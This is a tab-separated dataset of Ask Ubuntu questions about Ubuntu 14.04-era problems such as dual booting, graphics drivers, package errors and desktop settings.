491089	mounting ipad/iphone on ubuntu 12.04	is there an update on the issue about mounting ios devices on ubuntu that has the `` trust this computer '' message loop ?
491090	grails different versions in ubuntu	i am using grails 2.4.0 for my recent grails application . now i have cloned a grails-app which is developed in grails 2.0.4 . my grails path is pointing to 2.4.0 , so that i just upgraded the 2.0.4 application into 2.4.0 . now some methods and classes are found deprecated , and some codes are found damaged . after that i have cloned the previous 2.0.4 and start running with 2.0.4 by editing the bashrc into 2.0.4 . but i need to edit both the applications simultaneously . is there any way to switch between 2.0.4 and 2.4.0 with out editing bashrc every time .
491091	install grub on usb drive / vaio pro 13	i 'm somewhat inexperienced with linux . i 'm having quite a hard time booting ubuntu 14.04 along side windows on my vaio pro 13 . i 've tried using every method i 've found on forums but no matter what , i can not boot the ubuntu installation after the install . i can boot off of the live usb and perform a successful installation , but when i reboot , the computer boots into windows right away . after looking through the efi partition i can see the entries that ubuntu ( and other linux distros i tried installing ) but somehow they 're all bypassed and windows boots right up . i can boot off of the usb flash drive to install ubuntu on the machine and the installation succeeds without mistakes . my question is , once i do install ubuntu on a partition on the ssd , can i install grub to a usb flash drive and boot into the ubuntu installation that way ? any help would be much appreciated . thanks .
491095	where can i find alternative folder icons ?	i want to find alternative icons for nautilus folder . i do n't want to find application or something else icons but icons for folders only ( in other words alternative nautilus folder/directory icons . ) where it is located ( if provided ) ? or i have to download ?
491098	ubuntu 14.04 wrong text in unmaximized window title	i am getting some wrong texts in place of symbols in ubuntu 14.04 unmaximized windows . how can i solve it ?
491099	avconv to use hardware acceleration	i have a radeon card and would like avconv to use hardware acceleration if possible . i have the proprietary driver-updates from the additional drivers tool .
491102	how do i run a .cmd file from a specific wineprefix ?	i have a .cmd file that modifies registry . i ran it to the default wineprefix just by opening it from nautilus . ( right click , open with , wine windows program loader ) . but i want it to modify the registry of a specific wineprefix too . so how do i run it with a specific wine prefix ? i tried this command wineprefix= '' path/to/prefix '' wineconsole cmd `` path/to/file.cmd '' .
491104	all folders and files in sd card and usb drive appearing as locked !	i am facing a wired problem and that is whenever i insert any usb drive or sd card in my computer , all folder and files inside it appear as locked ! and therefore i ca n't crate any new folder and delete any folder from sd card or usb drive ! i do n't know why it is happening and how to solve this . anybody please help me .
491107	unable to boot windows 8 after installing ubuntu	i 've tried reading around , but i have n't been able to find any solution that works for me . http : //paste.ubuntu.com/7740463/
491109	device driver needed for lg 16x blu-ray/dvd writer	i built a new computer using an msi z97 guard pro motherboard and an i5 cpu . i installed 8 gigs of ram . i used the old 500 gig sata hard drive but had to buy another sata cdrom . it is an lg 16x blu-ray/dvd writer super multi blue bh16 has any one written a driver for this device ? ? ? ? ? ? ? ? or where can i get one ? i am a noob and not a programmer so i ca n't write one on my own . it came with a cd with only windows drivers on it . this was recommended to me at the store where i bought it . after reading the box better it states that it is for win 8.1 down to xp sp3 , 32 or 64 bit . i used the cd from the ubuntu mag 13.10 and loaded the system . the device worked there . upgraded to 14.04 . later tried to play some movies and it will not play any dvd movie i have or a blu_ray i borrowed . i realized that it was not supported so i contacted the manufacturer and was told that they do not do linux period . they could not help with a driver . thanks for the help . don
491110	installing vmware	i want to install vmware in my ubuntu 14.04 . while executing : sudo apt-get install build-essential linux-headers- $ ( uname -r ) i 'm getting a notification : ubuntu 14.04 lts _trusty tahr_ - release i386 ( 20140417 ) 'in the drive '/media/cdrom/ ' and press enter
491111	battery icon missing in gnome-shell panel	i have lost the battery icon on panel when i rotated the screen using ccw ( /etc/x11/xorg.conf ) and ca n't get it back . dconf editor → com → canonical → indicator → appmenu → power shows icon policy present , and show time visible but no battery icon showing up on panel . can anyone help me ?
491112	increase the number of tcp connections allowed	for a ubuntu 14.04 web server providing a web service via a tcp port , clients query the server at an interval . however when the server restarts , a huge number of connections hit the server at the same time and many of them time out for the first 10 minutes . ulimit -n have already been increased to 1048576 . how can the number of simultaneous connections be increased ? hopefully this will solve the timeout problem . if not , is this due to a limit set on another system resource ?
491116	starting load fallback graphics devices [ fail ]	i have a problem after updating ubuntu . booting fails with the following error : i did burn a copy of ubuntu on the usb shows me this error . so do i enter recovery mode and get the following error : entity failed for '/dev/sdb ' : invalid argument i 'm new in ubuntu i do not know what to do and i have a lot of important files i need . i 'm using ubuntu 12.04 on a ssd .
491118	how to show/hide special folders in home directory nautilus	in nautilus home folder shows some special folders like : music , documents , pictures etc . most of the time i am not interested in browsing these directories . is there any way to toggle the visibility of these type of folders in home directory ? is it possible to show files and folders in groups ( like in window vista ) . note that this is not same as this question .
491119	only wallpaper apear and curcor !	only wallpaper and cursor showing after installing ubuntu whitout problems . what i happend strong text
491121	is there a standalone graphical application for configuring network manager ?	i was working through a kiosk computing question yesterday . somebody is trying to deploy ubuntu as a single-application appliance in a way that they can hand the machine to a client and it 'll let them configure a network on first-boot but after that it 'll boot into firefox . the booting into firefox part is simple but configuring networks is somewhat harder . nmcli is an option but what if the people handling these machines does n't understand it ? i 'd like a graphical method . also there 's the problem that there might not be an installed underlying desktop environment . assume this is an ubuntu server installed with x , network manager and firefox but no unity/gnome/kde or their various configuration applications . version 0.9.10 of network manager âwith its lovely curses-based nmtui command-line appâ did n't make it into 14.04 ... so that 's off the cards . i 'd prefer to avoid any command line interaction on this one because i 'm frankly not sure if the deploying people have password access to the command line . they might only have an on-screen keyboard . we need to tick the following boxes : so simple your grandma could use it . graphical so we do n't have to force somebody to log in via a tty standalone so it does n't need a desktop running in the background dependency-light so we do n't need to install half a desktop to run it . what applications are available and ( if they 're part of a desktop ) how do you install them in the lightest possible way ? the original question is n't mine but i can test answers as i have a kiosk-style machine .
491124	how do i install no-ip duc on ubuntu 14.04 ?	i want to install no-ip duc on ubuntu 14.04 . when i run the following command ( as the guide says ) sudo apt-get install noip2 i get the following error . e : unable to locate package noip2 how can i fix this and how can i install no-ip duc on ubuntu 14.04
491126	7z data compression utility -is missing	how can i correct it ? also cmake and autoreconf tool are missing . nitc @ nitc-optiplex-7010 : ~/workspace $ bake.py check > python - ok > gnu c++ compiler - ok > mercurial - ok > cvs - ok > git - ok > bazaar - ok > tar tool - ok > unzip tool - ok > unrar tool - ok > 7z data compression utility - is missing > xz data compression utility - ok > make - ok > cmake - is missing > patch tool - ok > autoreconf tool - is missing > path searched for tools : /usr/lib/lightdm/lightdm /usr/local/sbin /usr/local/bin /usr/sbin /usr/bin /sbin /bin /usr/games /usr/local/games /home/nitc/workspace/bake /home/nitc/workspace/bake bin /home/nitc/workspace/bake /home/nitc/workspace/bake
491127	ubuntu 14.04 with nvidia proprietary driver problem	okay hi guys , i 've tried multiple solutions to other ( similar ) problems posted here but sadly they do n't yield anything good : ( my stuff : acer aspire v3-471g intel core i5-3210m currently using 14.04 32bit ( my laptop worked fine with 12.10 and 13.04 32bit ) my graphic cards : intel corporation 3rd gen core processor graphics controller ( rev 09 ) nvidia corporation gf108m [ geforce gt 630m ] ( rev a1 ) ( i got the graphic cards info from sudo lspci | grep vga ) i installed from a live usb . i 've done it countless times before . though this time , when the live usb booted up i got a `` playlist update failed '' error . so i closed everything and did some research . after all that , i booted the usb , pressed any key at the `` keyboard and man '' page and i accessed the boot options . i then activated the `` nomodereset '' option and selected the `` install ubuntu '' option . then everything went smoothly . everything installed well and all that . yay . the installation completed and i ended up in the login screen , i entered my password and waited a minute or so from the delay and everything loaded quite fine . so far so good . then i started doing the usual stuff . updating , upgrading , loading repositories , and installing what i wanted . one of the things i installed was vlc because i like watching music videos , and anime , and movies and all that . i also installed steam because i play dota 2 a lot . now the it was only then that i saw multiple problems . my system lags when i resize any window . vlc lags when playing videos . dota 2 interface does not display correctly . also when i do any of these 3 ( or anything similar ) my cpu performance spikes despite having four cores working so of course i pinpointed the problem to one of my graphic cards . it ca n't be intel cause i never had problem with it so it must be nvidia ( also it seems to be very notorious among ubuntu users ) most of the forums/questions/answers/tutorials i 've seen pinpoint the drivers being used as the problem since ubuntu forces me to use the open source nouveau drivers which basically does n't work well for nvidia . so i prompted to get the proprietary nvidia drivers . what could go wrong right ? well i was able to find out that the driver i need is the 331.79 so i downloaded it and followed instructions . i booted to tty . ran the sh *insert nvidia installer here.run* file ran the xconfig thingy so that my laptop will use the nvidia drivers and rebooted now of course i 'm calm because my problem is supposedly solved . apparently not , after loggin in at the login page , i just got the wallpaper and my cursor . nothing else . another problem great . anyway you get the gist of my problem hopefully . i 've tried so many stuff like using bumblebee , nvidia-prime , etc . i just want my nvidia chip to work so help please ? : d oh right now the solution i 'm using is installing 32bit instead of 64bit ( yeah i tried 64bit first since my hardware is supposed to be able to handle it ) i have n't tried installing the nvidia driver yet but i 'll update soon . sorry for my lengthy question but i just wanted to put everything on the table hahaha thanks : d
491128	how does synaptic have updates when i 've just updated from the command line ?	how can that be ? i thought the cli was the nuts ( that 's a good thing ) . i go there ( ctrl + alt + f1 ) and : sudo apt-get upgrade sudo apt-get update sudo apt-get check all 's well . go back to the gui and open synaptic package manager and : reload mark all updates ... and it 's there ! what ? i just did that on the command line . how can there be stuff that need updating ?
491129	7z `` is not supported archive '' while updating an archive	while updating an archive we are getting this error : $ 7za u -ppasswored -mhe=on -r -m0=lzma -mx=9 -mfb=64 -md=32m '-x ! temp ' filename.7z /home/software error : xxxxxxx.7z is not supported archive system error : operation not permitted what does it mean ? how can we fix it ?
491130	local mail in thunderbird in /var/mail/username	i 'm trying to configure thunderbird to read local mail , as described in the answer in similar question : how read local email in thunderbird ? however my mail is stored in /var/mail/username file . thunberbird is looking for mail in /var/spool/mail/ and i get errors that this directory can not be read . how to configure thunberbird to read mail from /var/mail/username ?
491138	wubi installation and standard ubuntu installation together ?	i have installed ubuntu through wubi in my machine . now i want to install ubuntu in the normal way ( maybe through live cd or bootable pen ) and i do n't want to uninstall my wubi ubuntu at this moment . so finally what i want to have is windows 7 , ubuntu ( wubi ) and the ubuntu installed through the standard way . will this configuration work ?
491139	failed to idle channel	i run ubuntu 14.04 on a acer aspire 5742g and for some reason after a while my screen goes black and i get this error messages : jul 2 21:01:44 steven-pc kernel : [ 1591.975086 ] nouveau e [ xorg [ 1078 ] ] failed to idle channel 0xcccc0000 [ xorg [ 1078 ] ] jul 2 21:01:44 steven-pc kernel : [ 1592.066902 ] nouveau e [ xorg [ 1078 ] ] failed to idle channel 0xcccc0000 [ xorg [ 1078 ] ] jul 2 21:01:46 steven-pc kernel : [ 1594.066097 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] channel 2 [ xorg [ 1078 ] ] kick timeout i found the error log in : /var/log/kern.log so far i know i have n't made any change to the kernel . does anyone any idea what is wrong ? if more information is required let me know .
491141	can i check nforce405/geforce6100 mcp temperature on linux ?	aida64 on windows show mcp ( a southbridge-like chip ) temperature as 50c . lm-sensors does n't show it at all . my motherboard is an asrock k8nf6g-vsta . here 's what sensors shows : i 'm using lubuntu 14.04 with sensors version 3.3.4 . here 's the sensors-detect output : '' driver `w83627ehf ' : * isa bus , address 0x290 chip `winbond w83627ehf/ef/ehg/eg super io sensors ' ( confidence : 9 ) driver `k8temp ' ( autoloaded ) : * chip `amd k8 thermal sensors ' ( confidence : 9 ) '' and /etc/modules : '' w83627ehf ''
491145	how do i reorder the nautilus right-click menu	how can i reorder the nautilus context menu ? when i right-click on an archive the top item is `` open with archive manager '' but way down the bottom is `` extract here '' . i would like to put the `` extract here '' item next to the `` open with archive manager '' item .
491146	terminal commands to hard shutdown and hard restart	i want to do hard restart and hard shutdown ( immediate shutdown and restart ) through terminal . is this possible through terminal commands ? and note that no answers in this how do i restart /shutdown from a terminal ? question does immediate shutdown or restart . so it 's not a dupe .
491150	ubuntu not detecting my windows partitions	i am trying to install ubuntu [ ubuntu-14.04-desktop-amd64 ] as dual-boot in a my windows 8.1 pro x64 , through usb installation . but , ubuntu is not detecting the partitions which i 've made for the installation purpose . all i can see is sort of a new hdd showing 500.1 gb . i am new to ubuntu os . so , i do not know how to solve this problem .
491156	sed replace text containing new line	i have a bash script for installing a web server on my ubuntu server . i 'd like , in the /etc/apache2/apache2.conf , to replace # serverroot `` /etc/apache2 '' # by # serverroot `` /etc/apache2 '' servername localhost # if i do sed -i 's| # serverroot `` /etc/apache2 '' | # serverroot `` /etc/apache2 '' \nservername localhost| ' /etc/apache2/apache2.conf it 's working , but i 'd like to include the blank line and the # after the # serverroot to avoid adding twice servername if the script is executed twice . i tried sed -i 's| # serverroot `` /etc/apache2 '' \n\n # | # serverroot `` /etc/apache2 '' \nservername localhost\n\n # | ' /etc/apache2/apache2.conf but it 's not working .
491159	theme gnome panel handles in flashback session	i 'm using the the gnome flashback session ( metacity ) in ubuntu 14.04 . the default theme is the ambient theme . if you set a gnome panel to not expand , the handles are looking ugly : how can i theme/change this ?
491165	`` some index files failed to download '' while installing the spotify client	after updating from 13.10 to 14.04 from livecd my spotify installation dissapeared . i tried to install it as before by following spotify guide and entering these commands : sudo apt-add-repository -y `` deb http : //repository.spotify.com stable non-free '' & & sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 94558f59 & & sudo apt-get update -qq & & sudo apt-get install spotify-client but all i get is this error : dominic @ dominic-ms-7592 : ~ $ sudo apt-add-repository -y `` deb http : //repository.spotify.com stable non-free '' & & > sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 94558f59 & & > sudo apt-get update -qq & & > sudo apt-get install spotify-client [ sudo ] password for dominic : executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- homedir /tmp/tmp.dqvohece8a -- no-auto-check-trustdb -- trust-model always -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver keyserver.ubuntu.com -- recv-keys 94558f59 gpg : requesting key 94558f59 from hkp server keyserver.ubuntu.com gpg : key 94558f59 : `` spotify public repository signing key < operations @ spotify.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1 w : failed to fetch http : //repository.spotify.com/dists/trusty/non-free/binary-amd64/packages 404 not found [ ip : 54.230.231.43 80 ] w : failed to fetch http : //repository.spotify.com/dists/trusty/non-free/binary-i386/packages 404 not found [ ip : 54.230.231.43 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . dominic @ dominic-ms-7592 : ~ $
491166	hyper-v console input weird characters	i am currently testing remote console access into an ubuntu 14.04 vm running on hyper-v 2012 r2 using wmi and incomplete/weird characters are being sent from hyper-v in place of the actual login details when i view the console while testing , see attached screenshot below . output from `` modinfo hv_vmbus '' on ubuntu 14.04 vm is below : filename : /lib/modules/3.13.0-24-generic/kernel/drivers/hv/hv_vmbus.ko license : gpl srcversion : 465317ff744e557398c21b4 alias : acpi* : vmbus : * alias : acpi* : vmbus : * depends : intree : y vermagic : 3.13.0-24-generic smp mod_unload modversions signer : magrathea : glacier signing key sig_key : 00 : a5 : a6:57:59 : de:47:4b : c5 : c4:31:20:88:0c:1b:94 : a5:39 : f4:31 sig_hashalgo : sha512 when testing the same process on a ubuntu 13.10 vm it logs in fine . output of `` modinfo hv_vmbus '' on the ubuntu 13.10 vm is below : filename : /lib/modules/3.11.0-12-generic/kernel/drivers/hv/hv_vmbus.ko version : 3.1 license : gpl srcversion : 2b4f042dbbf6dca143dee4a alias : acpi* : vmbus : * alias : acpi* : vmbus : * depends : intree : y vermagic : 3.11.0-12-generic smp mod_unload modversions i suspect that the newer version in ubuntu 14.04 maybe the issue , but have so far not been able to pinpoint the cause . please assist .
491167	installed ubuntu 14.04 on same hdd as windows 7 , windows 7 wo n't boot	i installed ubuntu on the same hard drive as my windows 7 ( different partition ofcourse ) edit : windows would n't boot and after trying to fix mbr with windows recovery console windows is n't recognized in boot anymore . i really do n't want to re-install windows , any help ? how can i make windows boot up again ? as for how i installed ubuntu : 1 . i had windows 7 already installed . 2 . used windows tools from within windows to shrink partition to free up space for ubuntu 3. rebooted into ubuntu from cd . 4 . used ubuntu installation disk tools 'something else ' option . to create new partiion for ubuntu from unallocated space . 5 . installation was done and then windows stopped booting . i managed to get to windows recovery console by pressing shift+f10 but now i 'm not sure how to fix the windows boot record . i tried using fixmbr , bootrec , bootsect /nt60 all /mbr . does n't seem to work ...
491170	can not change anything on vsftpd.conf	i 'm using ubuntu 14.04 and need to setup ftp on it , i tried to configure ftp on the first os account ( type : administrator ) , opened vsftpd.conf and changed something on it for ftp , but could n't save , it showed `` you do n't have permission '' . and also how to remote my ubuntu desktop from outside ( which way , port , ... ) . i 'm a beginner . pls help . thanks and best regards , thanh vo .
491171	how to make sure hfs+ drive is writeable	i have a 1tb hfs+ drive mounted on boot ( relevant line in fstab : ) uuid=1b86e294-8f48-3f8d-932b-634460a0af65 /media/guy/terra hfsplus defaults , force , rw , user 0 0 . most of the time it 's fine and mounts with write permissions . however after a bad suspend ( another issue ! ) or powercut - it mounts read only . i can then remedy this by running sudo fsck -y /dev/sdb2 which outputs : fsck from util-linux 2.20.1 ** /dev/sdb2 ** checking hfs plus volume . ** checking extents overflow file . ** checking catalog file . ** checking multi-linked files . ** checking catalog hierarchy . ** checking extended attributes file . ** checking volume bitmap . ** checking volume information . ** the volume terra appears to be ok . i then reboot and the drive is writable again . is there anyway around this ? e.g . a way to re-mount it without reboot.. ( i 've tried remounting , but it remains read only ) happy to give any further info required.. thanks , guy
491176	multi screen inactivity suspend	i am new at this so please bear with me , my question is : i have two screens on my pc one 22 '' monitor and one 26 '' hdtv now the monitor is connected via a vga port and the tv via a hdmi port both of which are running from the same on-board graphic chip . what i would like to do is set them up so that i can have the vga screen to time out and suspend its self when inactive but keeping the hdmi screen always on and unable to time out or suspend . the reason i want to do this is i have the tv running you tube for the kids and the pc screen for me and unless ' disable the activity section in dconf-editor both screens turn off , and i want the monitor to be able to turn of whilst allowing the tv to stay on and carry playing kids tv via youtube .
491180	unable to run package manager on ubuntu 14.04 lts	error message being displayed in notification : 'error : opening the cache ( e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty-updates_multiverse_i18n_translation-en , e : the package lists or status file could not be parsed or opened. ) ' . this usually means that your installed packages have unmet dependencies .
491183	dual boot problem ubuntu14.04 and windows 7 - windows wo n't start	i have problem with ubuntu 's bootloader . ubuntu works fine , but when i try loading windows , my screen goes half-black , half-purple with some semi-horizontal white lines , or just purple with those lines : this has been happening since the beginning , but removing the battery and starting computer again solved the problem at first , then later using a boot-repair cd solved the problem , but now nothing works and i just ca n't get it to load windows . here 's boot summary info if it will help : http : //paste.ubuntu.com/7741166/ windows 7 is 64bit .
491184	texinfo downgrade	can anyone help me with downgrading a texinfo package from version > 5 to 4.13 ? this version comes with ubuntu 13.04 or higher and i urgently need 4.13 version . i 've found this .patch files but do n't have any clue how to install/implement it . thread patch
491185	keyboard starting layout	i have just upgrade my system to 14.04 during instalation i chose greek as the main keyboard language when i was prompted to enter the password i used one with latin characters in the problem is that i can not login to my system as the main language is greek and i can not type english . i have tried to go on to console but i also can not type english . i can only type greek . i know that the easiest thing is to do another instalation but i was wontering whether there is a way round it . i can add the english keyboard as a guest but i can not use terminal to do changes .
491186	how to execute a program periodically ? & disply difeerence in output	i want to run command repeatedly and display their output . example : i want to run ls command repeatedly and display output so-that i can see changes in directory contents . also facility to highlight difference in out-put and specify time-interval . how to do that ? suggest command .
491189	installing crossvc is giving broken packages error	i am having ubuntu 14.04 lts . while trying to install crossvc , i am getting broken package error . i tried to find solutions and tried all the suggested steps in different posts . but no success . logs for sudo apt-get install crossvc reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : crossvc : depends : libqt3-mt ( > = 3:3.3.8-b ) but it is not installable e : unable to correct problems , you have held broken packages . logs for sudo aptitude install crossvc the following new packages will be installed : crossvc { b } libfam0 { a } 0 packages upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 1300 kb of archives . after unpacking 4048 kb will be used . the following packages have unmet dependencies : crossvc : depends : libqt3-mt ( > = 3:3.3.8-b ) which is a virtual package . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) crossvc [ not installed ] accept this solution ? [ y/n/q/ ? ] n *** no more solutions available *** the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) crossvc [ not installed ] accept this solution ? [ y/n/q/ ? ] logs when installing using ubuntu software center package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : crossvc : depends : libc6 ( > = 2.4 ) but 2.19-0ubuntu6 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libqt3-mt ( > = 3:3.3.8-b ) but it is not going to be installed depends : libstdc++6 ( > = 4.2.1 ) but 4.8.2-19ubuntu1 is to be installed other option tried even i tried with doing the below for resolving broken package [ referred from different posts ] but no success . sudo dpkg -- configure -a sudo apt-get clean & & sudo apt-get update dpkg -- get-selections | grep hold [ no package listed ]
491190	tor not working after update	yesterday i updated my ubuntu 14.04 lts and after that tor stopped working : when i try to run tor using command sudo service tor start it gives an error aa-exec : error : profile 'system_tor ' does not exist prior to the update everything was working fine .
491191	gnome-terminal - restoring of config for profiles	where are the profiles for gnome-terminal stored on the filesystem ? i recently restored my home folder from backup on a new ubuntu installation , but the profiles for gnome-terminal were not restored . i 've still got access to the root of the filesystem from my previous ubuntu installation , and would like to pull the profiles out of that from wherever they are stored ? this is similar to where are gnome-terminal profiles stored in the filesystem ? however the solution to that specifies using gconf-editor , which i 've tried but which only allows me to modify the current setup .
491192	free displays incorrect memory on nexus 10	i 'm playing about with ubuntu touch on a nexus 10 ( which should have 2gb ram ) . phablet @ ubuntu-phablet : ~ $ free -h total used free shared buffers cached mem : 1.1g 1.0g 90m 7.1m 34m 716m -/+ buffers/cache : 259m 841m swap : 511m 12k 511m any ideas why total memory is shown as 1.1gb ?
491196	how to paste a path in `` ubuntu explorer '' to rapidly access a folder ?	i was browsing a local web page , i copied the adress ( file : ///media/383c4e753c4e2de6/rar/lua/estacao/003/pessoas.htm ) , and now i want to paste this path ( file : ///media/383c4e753c4e2de6/rar/lua/estacao/ ) in the `` ubuntu explorer '' to rapidly access the folder `` estacao '' , and copy the folder `` 003 '' . i also want to create a shortcut in the folder `` document '' using the path copied to clipboard .
491200	suspend state in ubuntu 14.04	setting in my computer is such that the system suspends when i close the lid.when i open the lid later on , the system boots up as though it was starting for the first time , and it was previously shut down . once i log in to my account and start using ubuntu 14.04 , there is a message stating that system problem was encountered and suggests me to send an error report . i have recently , erased and re-installed ubuntu 14.04 and my software is up to date . this thing ( system program problem ) , occurs each time i close my lid . and all my previous work is lost . what is the solution ?
491206	samsung-laptop kernel module	is samsung-laptop kernel module still blacklisted while using uefi on a samsung computer ? is there a way to load it without bricking my laptop ?
491207	ca n't install windows 8 on ubuntu pc	i have ubuntu 14.04 and i want to install windows 8 along side it . but i ca n't boot from any live cd or pendrive . my laptop goes into network boot and says- insert proper boot device and press any key . my laptop is asus x54c .
491211	sudo error , setuid	i 'm using ubuntu 14.04 and i run some command series on terminal . but at one time i ran sudo chmod 777 /usr/bin/ -r and giving some permissions on this directory . after that , i 'm continue my work , and i got this message : sudo : /usr/bin/sudo , owned by 0 users identity and should be setuid bit set i 'm new on ubuntu , what should i do ?
491216	visiontek modem in ubuntu	within a few days my broadband connection will be cut.then the only way i can connect is to use a usb modem ( visiontek 82gh hsupa ) .the problem is i can not use the modem in an ordinary account and has to login using a root account to use it.so is there some way to use an ordinary account to use the modem.using gksudo or sudo does'nt help.please this is urgent.thanks in advance.i am using ubuntu 14.04 . please suggest some way to get temporary root rights or something else . for those who do'nt know how visiontek works , i will try to explain it the best i can . in windows visiontek can be run by just inserting it and then installing a program.but in linux its more complicated.you have to copy a folder from the modem to the usr folder.and in that you should first run the install script and dialup script both with root rights , all while inserting the modem.when i run the dialup script in an ordinary acount it says the usb modem is not ejected even when it is while in the root account it runs okay ( you have to eject the modem before dialup for it to work.this will open the built-in memory card reader . )
491217	how change gedit preferences in xfce / xubuntu ?	where can i find gedit preferences in xubuntu ? they are like some rare , elusive bird . numerous help forums like this give varying reports of where it might have been spotted . but you go where they say they saw it and you will see no sign that it was ever there at all . no poop . nothing . i 've tried and failed to find it by looking in : xubuntu settings manager ~/.gconf/apps/ /usr/share/gedit/ ~/.config/gedit/ ~/.gnome2/ /usr/share/doc/gedit/ at each juncture , i was meanwhile also searching for the answer in forum hell . there is a routine in forum hell . it goes like this : someone like me , who knows nothing , asks a stupid question in a forum ; then a procession of goofs who know next-to-nothing take turns in guessing the answer . the person who asked the question gives up the will to live . then some other bozo like me comes searching for a similar answer and after spending half their morning following the goofy guesses up dead ends gives up the will to live as well . that 's roughly what happened . i looked for the gedit preferences in the gedit menu as well . but it had only some of its preferences available . like they where a lure to get users to look under the bonnet . if you want to change the colour settings in gedit you have to get a degree in untying granny knots , because that 's the skill you need navigate the linux file system , configuration files and help forums to do something as simple as change a colour . back to the question of where the gedit preferences are , i looked finally on the gedit website . it had nice mickey mouse instructions for changing the fischer price preferences you can already find easily enough in the gedit menu - and are thankfully already plain and simple to use . so it had some nicey nicey help pages on the things you do n't really need help on . and happy smiley silence on the stuff that causes you to seek help . it has seemed for a long time that gnome 's solution to the general problem of linux being such a tangle was to oversimplify until there were barely any options left at all : just a few because we do n't think the stupid people we make software for will be able to cope with any more . they may have a point . my head hurts . and i do n't actually have a keyboard . i ca n't operate one . i have special pads like on those electronic drum kits they had in the eighties . and i thump my hands up and down on them . it makes nice noises . and someone interprets them into the words you see here . what i 'm thumping at is i would like to increase the document history list in gedit like wot i had before my linux crashed and made me have to reinstall everything again . i need to do this because after i installed everything again , linux crashed again and i lost all my open documents . i mean , i do n't know where they are . and the gedit menu only shows the last five . btw , i second what he said : '' btw , about all these configuration tools , this is so confuse , we have gconf-editor , dconf-editor , gconftool-2 , i think there is more also.. would be easier if they made something unified like linux-regedit ... â aquarius power jun 17 '13 at 14:13 '' gedit 3.6.1 , how to increase the number of recent files from its default of 5 ? and btw , i do think gedit is brilliant . and this having to look under the bonnet , though shere hell , has not been without its rewards . i have discovered that there are such things as vala and gobject - ooh , that might be nice - i just do n't have any time to look at them because i need to get some work done and i 've already wasted too much time firefighting bugs and trying to do something as simple as change preferences . linux might be free but it makes you poor . and and btw , the problem with these settings managers is not that they offer too many preferences but that they are written in dalek . many preferences are good . daleks are bad . and and and btw , stackexchange would n't let me add a xfce4-settings-manager tag because no such tag already exists and i do n't have enough browny points to create one . but it 's a package name . why not allow any tag to be created that matches against package names and wotnot ?
491222	hibernate option disappeared from power menu in ubuntu 14.04	i have ubuntu 14.04 in my acer-aspire-5749 laptop . i have been using it for a few months . the hibernate option was working fine until i rebooted my pc today . now it has disappeared form the power menu . how to fix this.. sudo pm-hibernate is working fine . following are the contents of my /var/lib/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla file.. [ re-enable hibernate by default in upower ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes [ re-enable hibernate by default in logind ] identity=unix-user : * action=org.freedesktop.login1.hibernate resultactive=yes
491223	7z `` ultra '' settings for zip format	7z `` ultra '' settings for .7z format are : 7z a -t7z -m0=lzma -mx=9 -mfb=64 -md=32m -ms=on what are the `` ultra '' settings for .zip format ( using 7z ) ?
491231	ca n't install ubuntu 14.04 , tried every option in the menu	i 'm trying to install ubuntu , my computer has the following configuration : mobo asus maximus vi extreme 2x ati r9 280x ( crossfire ) 8gb ram 120gb kingston ssd sata 2xconventional hd , 500gb and 1000gb when i try to install ubuntu , even trying with the nomode option set , the screen goes black with a blinking line on the left upper part of the screen , and it does nothing . i 've tried with older versions , but i ca n't install it . every help is appreciated , i really need to install it . thank you !
491232	where can i find / build gnu modula-2 for ubuntu 14.04	i tried the debian archives referenced at http : //www.nongnu.org/gm2/overview.html , and also re-compiling from source failed . where can i find a pre-built / buildable gnu modula-2 compiler package for ubuntu 14.04 ?
491233	gnome 3 extension for zooming windows in overview	as is pointed out in [ 1 ] and discussed in [ 2 ] , the feature of zooming windows in the gnome-shell overview by scrolling with the mouse wheel has been removed . is anyone aware of an extension that implements this feature ? note , i 'm particularly referring the feature discussed in [ 2 ] where post # 28 exactly names the reasons why i think this feature is valuable . [ 1 ] zoom window in gnome overview mode [ 2 ] https : //bugzilla.gnome.org/show_bug.cgi ? id=686639
491237	problems uninstalling ubuntu/grub on a windows 8 laptop	i have tried to uninstall ubuntu on my dual-booted windows 8 laptop and seem to be having issues with removing the grub startup thing . when it starts up , the grub `` menu '' just says , '' gnu grub version 2.02~beta2-9 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . '' i have removed the partition that had ubuntu on it ( there was only one ) , reclaimed it to windows 8 , did all the bootrec commands , and i still get that message . i have to boot windows 8 by hitting the f12 button upon startup and selecting the hard drive that it 's on rather than `` windows boot manager . '' also on the startup list , is ubuntu . i have followed the suggestions in several other threads : super grub disk iso solution - > could n't even get it to boot from the flash drive remove using the `` fix disk '' that comes with windows also have tried the extended commands listed here to no avail . any help would be greatly appreciated .
